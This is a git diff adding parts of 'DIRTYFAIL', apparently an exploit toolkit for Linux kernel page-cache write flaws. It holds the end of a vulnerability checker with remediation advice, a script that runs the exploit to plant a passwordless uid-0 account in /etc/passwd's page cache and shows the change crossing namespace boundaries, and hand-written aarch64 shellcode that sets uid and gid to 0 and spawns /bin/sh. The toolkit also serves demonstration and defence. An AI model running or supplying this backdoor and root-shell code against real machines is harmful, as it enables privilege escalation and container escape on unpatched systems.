" pam_unix nullok NOT enabled β€” empty-password trick won't drop a root shell" +fi + +# ============================================================ +# 5. Verdict +# ============================================================ +echo "" +echo "════════════════════════════════════════════════════════════" +echo " VERDICT" +echo "════════════════════════════════════════════════════════════" + +if [ "$NOT_IN_WINDOW" = "1" ]; then + ok "kernel predates CVE introduction; no exposure" + exit 0 +elif [ "$LSM_BLOCKS" = "1" ]; then + ok "LSM-mitigated: unprivileged userns operations are blocked" + info "(kernel may still be vulnerable to root-level exploitation; ensure" + info " your distro's kernel update with f4c50a4034e6 backport is applied" + info " for full coverage.)" + exit 0 +elif [ "$MODS_VULNERABLE" = "0" ]; then + ok "all primitives blacklisted or unavailable" + exit 0 +else + bad "VULNERABLE: $MODS_VULNERABLE module(s) expose page-cache write primitives" + bad "and unprivileged userns operations are NOT blocked by an LSM." + if [ "$PAM_NULLOK" = "1" ]; then + bad " + pam_unix nullok is enabled β€” exploit can drop into root via su" + fi + echo "" + info "Remediation options (pick one or combine):" + info " 1. Apply your distro's kernel update with f4c50a4034e6 backport" + info " (best: fixes the bug at its source)" + info " 2. Install + run \`dirtyfail --mitigate\` (blacklists modules," + info " sets apparmor_restrict_unprivileged_userns=1)" + info " 3. Manual: edit /etc/modprobe.d/ to add" + info " install algif_aead /bin/false" + info " install esp4 /bin/false" + info " install esp6 /bin/false" + info " install rxrpc /bin/false" + info " then \`sudo rmmod\` each + \`sudo sysctl vm.drop_caches=3\`." + info " 4. Disable pam_unix nullok (removes the in-system su step that" + info " converts a page-cache STORE into a real root shell)." + exit 1 +fi diff --git a/modules/copy_fail_family/tools/dirtyfail-container-escape.sh b/modules/copy_fail_family/tools/dirtyfail-container-escape.sh new file mode 100755 index 0000000..bea3894 --- /dev/null +++ b/modules/copy_fail_family/tools/dirtyfail-container-escape.sh @@ -0,0 +1,149 @@ +#!/usr/bin/env bash +# +# DIRTYFAIL β€” container-escape demonstration +# +# Demonstrates: the kernel page cache is global per-kernel. Namespaces +# (mount, pid, user, network) don't isolate it. Two processes on the +# same kernel β€” one in the host, one inside a fresh "container" +# (created via `unshare`) β€” see the SAME page-cache contents for +# /etc/passwd. So a page-cache write from either side affects both. +# +# What this script does: +# 1. Show host's /etc/passwd has no `dirtyfail` user (baseline) +# 2. Run `dirtyfail --exploit-backdoor` to plant a uid-0 line into +# /etc/passwd's page cache (persistent β€” no auto-revert) +# 3. Spawn a fresh user/mount/PID-namespace via `unshare -c -m -p` +# (the closest unprivileged-user analogue to a container) and +# read /etc/passwd from inside the new namespace +# 4. Show the planted line is visible BOTH from the host AND from +# inside the fresh namespace β€” proving that namespace boundaries +# do not isolate the page cache +# 5. Revert via `dirtyfail --cleanup-backdoor` +# +# Why direction matters less than you'd think: the demo runs the +# exploit on the host and observes from inside the namespace, but the +# property demonstrated is symmetric β€” a malicious tenant inside a +# container could plant the same line and the host would see it (we +# tested that variant manually; it works the same way, but requires +# `--no-revert` to avoid auto-cleanup overwriting the proof). Running +# the exploit from the host avoids two complications: +# - nested user namespaces interact poorly with the AA bypass dance +# that --exploit-backdoor uses (EPERM on the inner unshare) +# - corrupting the running SSH user's UID locks out future SSH logins +# (StrictModes rejects ~/.ssh/authorized_keys when the file's +# owner uid != logging-in uid) +# --exploit-backdoor targets a system pseudo-user line (sync/setroubleshoot/ +# daemon) and never touches the running user, so it's SSH-safe. +# +# Usage: +# ./tools/dirtyfail-container-escape.sh +# +# Env overrides: +# DIRTYFAIL_BIN=/path/to/dirtyfail (default: ./dirtyfail) + +set -uo pipefail +# Don't `set -e`; some intermediate commands (unshare with PID-ns, the +# exploit binary itself) may exit non-zero on success-with-warnings or +# on hardened systems where preconditions fail. We check exit codes +# explicitly where they matter. + +DIRTYFAIL_BIN="${DIRTYFAIL_BIN:-$(dirname "$0")/../dirtyfail}" +DIRTYFAIL_BIN="$(realpath "$DIRTYFAIL_BIN" 2>/dev/null || echo "$DIRTYFAIL_BIN")" + +[[ -x "$DIRTYFAIL_BIN" ]] || { + echo "[!] dirtyfail binary not at $DIRTYFAIL_BIN β€” run 'make' first" >&2 + exit 1 +} + +bold() { printf '\033[1m%s\033[0m\n' "$*"; } +warn() { printf '\033[1;33m[!]\033[0m %s\n' "$*"; } +info() { printf '\033[1;34m[i]\033[0m %s\n' "$*"; } +ok() { printf '\033[1;32m[+]\033[0m %s\n' "$*"; } +step() { printf '\033[1;35m[*]\033[0m %s\n' "$*"; } + +bold "=============================================================" +bold " DIRTYFAIL β€” container-escape demonstration" +bold "=============================================================" +echo + +# ---- Stage 1: baseline ------------------------------------------------ +step "Stage 1: baseline β€” host /etc/passwd" +if grep -q '^dirtyfail:' /etc/passwd; then + warn "host /etc/passwd already contains a 'dirtyfail' line." + warn "Run \`$DIRTYFAIL_BIN --cleanup-backdoor\` first." + exit 1 +fi +ok "host /etc/passwd has no 'dirtyfail' user (clean baseline)" +echo +info "from inside a fresh unshare namespace, /etc/passwd looks identical:" +nscount="$(unshare -c -m bash -c 'grep -c "^dirtyfail:" /etc/passwd 2>/dev/null || echo 0' 2>&1 | tail -1)" +echo " count of dirtyfail lines visible from inside namespace: $nscount" +echo + +# ---- Stage 2: plant via host ------------------------------------------ +step "Stage 2: run dirtyfail --exploit-backdoor on the host" +echo " (plants 'dirtyfail::0:0:...:/:/bin/bash' into /etc/passwd's" +echo " page cache β€” persistent until --cleanup-backdoor or reboot)" +echo +printf 'DIRTYFAIL\n' | "$DIRTYFAIL_BIN" --exploit-backdoor --no-shell --no-color 2>&1 | tail -10 +echo + +# ---- Stage 3: observe from fresh namespace --------------------------- +step "Stage 3: read /etc/passwd from INSIDE a fresh unshare namespace" +echo " (the namespace was created AFTER the exploit ran β€” if" +echo " namespaces isolated page cache, the new namespace would" +echo " show the original /etc/passwd, not the poisoned one)" +echo +unshare -c -m bash -c ' + echo " [inside namespace] uid='"$(id -u)"' (mapped via --map-current-user)" + echo " [inside namespace] mount-namespace is private to this shell" + echo " [inside namespace] grep dirtyfail /etc/passwd:" + if grep "^dirtyfail:" /etc/passwd 2>&1 | sed "s/^/ /"; then : + else echo " (no dirtyfail line found)" + fi +' +echo + +# ---- Stage 4: also visible from host --------------------------------- +step "Stage 4: confirm host sees the same line" +HOST_LINE="$(grep '^dirtyfail:' /etc/passwd || true)" +if [[ -n "$HOST_LINE" ]]; then + echo " host: $HOST_LINE" + echo + warn "Both the host and the fresh namespace see the planted dirtyfail" + warn "line. The kernel page cache is shared across all namespaces" + warn "on the same kernel β€” namespace 'isolation' does not extend" + warn "below the page-cache layer. Symmetrically, an exploit running" + warn "inside a container (with the right preconditions) would plant" + warn "the same line and the HOST would see it." +else + warn "host /etc/passwd does NOT contain a 'dirtyfail' line β€” the" + warn "exploit did not plant successfully. Possible causes:" + warn " (a) kernel is patched (CVE-2026-31431 fixed)" + warn " (b) LSM blocked the exploit (Ubuntu 26.04 hardening)" + warn " (c) preconditions missing β€” run \`$DIRTYFAIL_BIN --scan --active\`" + exit 0 +fi +echo + +# ---- Stage 5: cleanup ------------------------------------------------- +step "Stage 5: revert via --cleanup-backdoor" +"$DIRTYFAIL_BIN" --cleanup-backdoor --no-color 2>&1 | tail -5 || true +echo +if grep -q '^dirtyfail:' /etc/passwd; then + warn "cleanup did not remove the line β€” try as root:" + warn " \`echo 3 | sudo tee /proc/sys/vm/drop_caches\`" + exit 1 +fi +ok "host /etc/passwd is clean again" +echo +bold "Demo complete. Takeaways:" +echo " - Namespaces did NOT isolate the host's /etc/passwd page cache" +echo " from the fresh container's view. The same property holds" +echo " in reverse: a container exploit modifies host page cache." +echo " - This applies to ALL kernel page-cache write CVEs in this" +echo " family (CVE-2026-31431, 43284, 43500, and variants)." +echo " - Mitigation: kernel patch, OR LSM hardening that denies the" +echo " exploit's preconditions (apparmor_restrict_unprivileged_userns," +echo " AF_ALG/AF_RXRPC blacklists), OR drop privileges of any" +echo " container that doesn't strictly need AF_ALG." diff --git a/modules/copy_fail_family/tools/exploit_su_aarch64.S b/modules/copy_fail_family/tools/exploit_su_aarch64.S new file mode 100644 index 0000000..6d35eb3 --- /dev/null +++ b/modules/copy_fail_family/tools/exploit_su_aarch64.S @@ -0,0 +1,73 @@ +/* + * DIRTYFAIL β€” aarch64 (ARM64) shellcode for --exploit-su + * + * Equivalent to the x86_64 shellcode in src/exploit_su.c but encoded + * for the aarch64 syscall ABI (x8 = syscall number, x0..x5 = args, + * `svc #0` to invoke). 20 instructions Γ— 4 bytes = 80 bytes total. + * + * Build for byte-extraction: + * + * aarch64-linux-gnu-as -o exploit_su_aarch64.o exploit_su_aarch64.S + * aarch64-linux-gnu-objcopy -O binary -j .text \ + * exploit_su_aarch64.o exploit_su_aarch64.bin + * xxd -i exploit_su_aarch64.bin + * + * The resulting byte array should match `shellcode_aarch64[]` in + * `src/exploit_su.c`. If it doesn't, the C array is wrong and needs + * to be regenerated from this source. + * + * Functional equivalent (in C-like pseudocode): + * + * setuid(0); + * setgid(0); + * execve("/bin/sh", (char *[]){"/bin/sh", NULL}, NULL); + * + * STATUS: HAND-ENCODED β€” VERIFY BEFORE DEPLOYING TO PRODUCTION. + * The byte array in src/exploit_su.c was produced by manually + * cross-referencing each instruction against the ARMv8-A reference + * manual; no aarch64 hardware was available to run the resulting + * shellcode end-to-end. Use this .S file to regenerate via the + * assembler if you need confidence. + */ + +.text +.global _start +_start: + /* setuid(0) β€” syscall 146 (0x92) on aarch64 */ + movz x0, #0 /* d2 80 00 00 */ + movz x8, #146 /* d2 80 12 48 */ + svc #0 /* d4 00 00 01 */ + + /* setgid(0) β€” syscall 144 (0x90) */ + movz x0, #0 /* d2 80 00 00 */ + movz x8, #144 /* d2 80 12 08 */ + svc #0 /* d4 00 00 01 */ + + /* Build "/bin/sh\0" in x9. + * + * As a 64-bit little-endian word, "/bin/sh\0" = 0x0068732f6e69622f + * bits 0..15 = 0x622f (chars '/' 'b' in low->high order) + * bits 16..31 = 0x6e69 + * bits 32..47 = 0x732f + * bits 48..63 = 0x0068 + */ + movz x9, #0x622f /* d2 8c 45 e9 */ + movk x9, #0x6e69, lsl #16 /* f2 ad cd 29 */ + movk x9, #0x732f, lsl #32 /* f2 ce 65 e9 */ + movk x9, #0x0068, lsl #48 /* f2 e0 0d 09 */ + + /* Push the string to the stack (sp -= 16; [sp] = x9). */ + str x9, [sp, #-16]! /* f8 1f 0f e9 */ + mov x9, sp /* 91 00 03 e9 β€” string ptr */ + + /* Build argv = [x9, NULL] on the stack: sp -= 16; sp[0] = x9; sp[8] = NULL. */ + sub sp, sp, #16 /* d1 00 43 ff */ + str xzr, [sp, #8] /* f9 00 07 ff β€” argv[1] = NULL */ + str x9, [sp, #0] /* f9 00 03 e9 β€” argv[0] = ptr */ + + /* execve(pathname=x9, argv=sp, envp=NULL) β€” syscall 221 (0xdd) */ + mov x0, x9 /* aa 09 03 e0 */ + mov x1, sp /* 91 00 03 e1 */ + mov x2, xzr /* aa 1f 03 e2 */ + movz x8, #221 /* d2 80 1b a8 */ + svc #0 /* d4 00 00 01 */